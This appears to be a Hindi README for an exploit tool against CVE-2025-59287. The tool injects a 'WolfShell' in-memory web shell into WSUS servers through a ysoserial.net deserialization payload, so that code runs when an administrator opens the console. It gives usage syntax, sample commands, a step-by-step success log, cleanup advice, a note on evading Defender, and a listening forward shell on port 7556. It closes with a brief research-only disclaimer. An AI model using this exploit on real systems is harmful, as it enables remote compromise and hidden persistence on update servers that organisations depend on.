
CVE-2025-59287 के लिए एक्सप्लॉइट, जो WSUS सर्वरों में WolfShell मेमोरी वेबशेल इंजेक्ट करता है ताकि एडमिन कंसोल खोले जाने पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त किया जा सके।
CVE-2025-59287 — WolfShell वूल्वरिन फॉरवर्ड मेमोरी शेल इंजेक्ट करना
CVE-2025-59287 WSUS से संबंधित घटकों में तार्किक दोष का उपयोग करके WolfShell मेमोरी शेल को लक्षित सर्वर में इंजेक्ट करता है। जब व्यवस्थापक WSUS कंसोल खोलता है (डिफ़ॉल्ट रूप से यादृच्छिक 1-30 मिनट के भीतर ट्रिगर होता है), मेमोरी शेल ट्रिगर होकर रिमोट कोड निष्पादन (RCE) का कारण बनता है। इस दस्तावेज़ में शोषण उदाहरण, आवश्यक फ़ाइलें और सुरक्षा अनुशंसाएँ शामिल हैं।
लक्षित सर्वर पर ysoserial.net डिसेरिएलाइज़ेशन पेलोड भेजें, कार्यक्षमता अनुकूलन योग्य है, यह प्रोजेक्ट वूल्वरिन मेमोरी शेल इंजेक्ट करने का प्रदर्शन करता है
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender ब्लॉक करके हटा देता है, उपयोग नहीं किया जा सकता

जैसा कि चित्र में दिखाया गया है, पोर्ट 7556 सफलतापूर्वक सुन रहा है, जो दर्शाता है कि वूल्वरिन मेमोरी फॉरवर्ड शेल इंजेक्ट हो चुका है


यह दस्तावेज़ केवल सुरक्षा अनुसंधान और सुरक्षा उद्देश्यों के लिए है। कृपया अनधिकृत सिस्टम या हमले की गतिविधियों के लिए संबंधित शोषण कोड का उपयोग न करें।